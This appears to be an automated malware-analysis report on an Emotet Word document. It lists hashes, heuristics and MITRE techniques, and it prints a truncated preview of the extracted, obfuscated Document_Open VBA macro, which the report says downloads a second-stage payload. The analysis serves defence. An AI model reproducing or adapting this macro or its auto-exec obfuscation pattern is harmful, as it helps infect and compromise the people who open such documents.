Emotet Office (OLE) malware analysis — malicious · 302d111df88971a8

MALICIOUS

Office (OLE)

138.0 KB Created: 2018-11-29 12:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 088e0aa1d899cc55046dcd2f1ae592a3 SHA-1: b40b2f3cb411e37f55d101d9019a50666160ff7b SHA-256: 302d111df88971a8852fad6dcfc4463c0ee7cbddd465ac127c0702c59d2757cb

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The macro is designed to execute obfuscated code that attempts to download a second-stage payload from a hardcoded URL. The ClamAV detection further supports the Emotet family attribution.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6826479-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826479-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8337 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8337 bytes
SHA-256: `5a2351906a0d74bc5e31adb2360477d3a279bf6e5366cdf2357cebc97bf3729b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RhJhwiWpsPlYI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next wQLTjhc = (QjEuC - Oct(ljtJicoLz) * JEDHiF - Sgn(104442554) - 71540570 + Fix(ihVuWp) + 3200385979# + 154192889 / 214673238 / oiMZjQUvV) Select Case tomRuJ Case 184398439 VRKTtjX = CLng(118011713) oWTiEH = Int(KmzfXq) Case 90210813 usRqu = Hex(27497285) MNSCO = CStr(242240221 * CByte(kcBOAjY)) End Select Set ojWGHMwH = Shapes("jqjuiwKrbIw") On Error Resume Next ASVchnL = (hfiMOUiH - Oct(ioPVvRcz) * fGkBAC - Sgn(70988843) - 9390445 + Fix(BzHlBdcX) + 2472436359# + 223535494 / 26044258 / VfBVJimE) Select Case AtfOH Case 34914053 jffBN = CLng(238090398) KismltX = Int(utkKaifr) Case 136244278 zjADbWu = Hex(157700206) qGCCUlC = CStr(285894034 * CByte(RvAKjUzmi)) End Select On Error Resume Next zYTcHfq = (dirbPU - Oct(jzmZXz) * fRDFWM - Sgn(170590965) - 327701511 + Fix(RktMSTWS) + 3387221339# + 172474369 / 204673658 / dNmfs) Select Case AZYhwXi Case 291786573 ZBIdt = CLng(207123179) ZrVIvPaU = Int(zUPCDQZ) Case 197826209 ZYQjlWhZ = Hex(117091075) QrwlXonvJ = CStr(238965674 * CByte(lzEIBCO)) End Select On Error Resume Next rRwpW = (hspXzO - Oct(JoEiivsSK) * RApWvo - Sgn(279889657) - 150090942 + Fix(foJzMinU) + 1017392629 + 285902742 / 132391769 / razGHPHFv) Select Case mjHjoht Case 246688436 zARjG = CLng(340217454) swuadaqN = Int(arQnYjR) Case 249027918 Bcsjt = Hex(41700334) dnUwaqr = CStr(42266321 * CByte(XKKVwL)) End Select On Error Resume Next HizvDInfZ = (zQidMXLA - Oct(TUBOuRkUo) * dApQzT - Sgn(47563800) - 19589971 + Fix(JSvZC) + 546446919 + 136338330 / 103265492 / GszBDR) Select Case ZFQCdToz Case 70877379 iHAfKFUHq = CLng(163736158) uzFaBRO = Int(WczXfZNrA) Case 178669456 iwPGaNPmw = Hex(261609911) tMsMfGK = CStr(187302282 * CByte(CZDnUkj)) End Select On Error Resume Next HvOYGbMNl = (dEwDN - Oct(vUIrHzR) * swGBiU - Sgn(251046870) - 306638680 + Fix(lwudY) + 2513922549# + 225554716 / 189024678 / FVbcc) Select Case aSIRkHnH Case 196217770 fIULj = CLng(112302493) iDLGTz = Int(iaOCtwi) Case 101981658 ZaLMUKs = Hex(328828414) QZsdNQVo = CStr(18708819 * CByte(YRaGTljKs)) End Select nfSRnplJZj = "" + miSHt + OUjAucfs + iTuHjXz + sbmpd + zZINLwk + ojWGHMwH.TextFrame.TextRange.Text + AEBLphw + fPoXHv + qjDGq + zSilUYjj On Error Resume Next vrwZnVCs = (zfwuHTX - Oct(CiAPwdb) * FcdIDWvfV - Sgn(95110193) - 329814231 + Fix(QkXXM) + 3374330829# + 309704176 / 248196837 / bIAlTI) Select Case vSwOUjisZ Case 235300878 bjQYsVR = CLng(65775830) KcCzip = Int(dUdWjNw) Case 242003778 RkljC = Hex(204167731) ddTCCCPfU = CStr(64730793 * CByte(nSQzfiLEY)) End Select On Error Resume Next zZjJITXP = (wicnSli - Oct(IhaSswHVL) * TZFLvUh - Sgn(327391050) - 159992539 + Fix(PzCZaWtOK) + 3165509549# + 268940923 / 17046362 / DabaQHaYo) Select Case uEpYnmHFU Case 89933549 cKfBrVFs = CLng(74273158) kQiCkT = Int(RqzYbAHVk) Case 328517199 cCqUo = Hex(42145847) PwYYlVj = CStr(192235408 * CByte(KnHWCSNo)) End Select On Error Resume Next rbRrqiTw = (LraMi - Oct(haIRZ) * IiIWwtQ - Sgn(29009368) - 102646753 + Fix(vDfvsmPiT) + 2581896189# + 27526179 / 41651882 / OqJwhMMX) Select Case iLizI Case 1 ... (truncated)

SHA-256: 5a2351906a0d74bc5e31adb2360477d3a279bf6e5366cdf2357cebc97bf3729b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RhJhwiWpsPlYI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
      wQLTjhc = (QjEuC - Oct(ljtJicoLz) * JEDHiF - Sgn(104442554) - 71540570 + Fix(ihVuWp) + 3200385979# + 154192889 / 214673238 / oiMZjQUvV)
      Select Case tomRuJ
         Case 184398439
            VRKTtjX = CLng(118011713)
            oWTiEH = Int(KmzfXq)
         Case 90210813
            usRqu = Hex(27497285)
            MNSCO = CStr(242240221 * CByte(kcBOAjY))
End Select
Set ojWGHMwH = Shapes("jqjuiwKrbIw")
   On Error Resume Next
      ASVchnL = (hfiMOUiH - Oct(ioPVvRcz) * fGkBAC - Sgn(70988843) - 9390445 + Fix(BzHlBdcX) + 2472436359# + 223535494 / 26044258 / VfBVJimE)
      Select Case AtfOH
         Case 34914053
            jffBN = CLng(238090398)
            KismltX = Int(utkKaifr)
         Case 136244278
            zjADbWu = Hex(157700206)
            qGCCUlC = CStr(285894034 * CByte(RvAKjUzmi))
End Select
   On Error Resume Next
      zYTcHfq = (dirbPU - Oct(jzmZXz) * fRDFWM - Sgn(170590965) - 327701511 + Fix(RktMSTWS) + 3387221339# + 172474369 / 204673658 / dNmfs)
      Select Case AZYhwXi
         Case 291786573
            ZBIdt = CLng(207123179)
            ZrVIvPaU = Int(zUPCDQZ)
         Case 197826209
            ZYQjlWhZ = Hex(117091075)
            QrwlXonvJ = CStr(238965674 * CByte(lzEIBCO))
End Select
   On Error Resume Next
      rRwpW = (hspXzO - Oct(JoEiivsSK) * RApWvo - Sgn(279889657) - 150090942 + Fix(foJzMinU) + 1017392629 + 285902742 / 132391769 / razGHPHFv)
      Select Case mjHjoht
         Case 246688436
            zARjG = CLng(340217454)
            swuadaqN = Int(arQnYjR)
         Case 249027918
            Bcsjt = Hex(41700334)
            dnUwaqr = CStr(42266321 * CByte(XKKVwL))
End Select
   On Error Resume Next
      HizvDInfZ = (zQidMXLA - Oct(TUBOuRkUo) * dApQzT - Sgn(47563800) - 19589971 + Fix(JSvZC) + 546446919 + 136338330 / 103265492 / GszBDR)
      Select Case ZFQCdToz
         Case 70877379
            iHAfKFUHq = CLng(163736158)
            uzFaBRO = Int(WczXfZNrA)
         Case 178669456
            iwPGaNPmw = Hex(261609911)
            tMsMfGK = CStr(187302282 * CByte(CZDnUkj))
End Select
   On Error Resume Next
      HvOYGbMNl = (dEwDN - Oct(vUIrHzR) * swGBiU - Sgn(251046870) - 306638680 + Fix(lwudY) + 2513922549# + 225554716 / 189024678 / FVbcc)
      Select Case aSIRkHnH
         Case 196217770
            fIULj = CLng(112302493)
            iDLGTz = Int(iaOCtwi)
         Case 101981658
            ZaLMUKs = Hex(328828414)
            QZsdNQVo = CStr(18708819 * CByte(YRaGTljKs))
End Select
nfSRnplJZj = "" + miSHt + OUjAucfs + iTuHjXz + sbmpd + zZINLwk + ojWGHMwH.TextFrame.TextRange.Text + AEBLphw + fPoXHv + qjDGq + zSilUYjj
   On Error Resume Next
      vrwZnVCs = (zfwuHTX - Oct(CiAPwdb) * FcdIDWvfV - Sgn(95110193) - 329814231 + Fix(QkXXM) + 3374330829# + 309704176 / 248196837 / bIAlTI)
      Select Case vSwOUjisZ
         Case 235300878
            bjQYsVR = CLng(65775830)
            KcCzip = Int(dUdWjNw)
         Case 242003778
            RkljC = Hex(204167731)
            ddTCCCPfU = CStr(64730793 * CByte(nSQzfiLEY))
End Select
   On Error Resume Next
      zZjJITXP = (wicnSli - Oct(IhaSswHVL) * TZFLvUh - Sgn(327391050) - 159992539 + Fix(PzCZaWtOK) + 3165509549# + 268940923 / 17046362 / DabaQHaYo)
      Select Case uEpYnmHFU
         Case 89933549
            cKfBrVFs = CLng(74273158)
            kQiCkT = Int(RqzYbAHVk)
         Case 328517199
            cCqUo = Hex(42145847)
            PwYYlVj = CStr(192235408 * CByte(KnHWCSNo))
End Select
   On Error Resume Next
      rbRrqiTw = (LraMi - Oct(haIRZ) * IiIWwtQ - Sgn(29009368) - 102646753 + Fix(vDfvsmPiT) + 2581896189# + 27526179 / 41651882 / OqJwhMMX)
      Select Case iLizI
         Case 1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.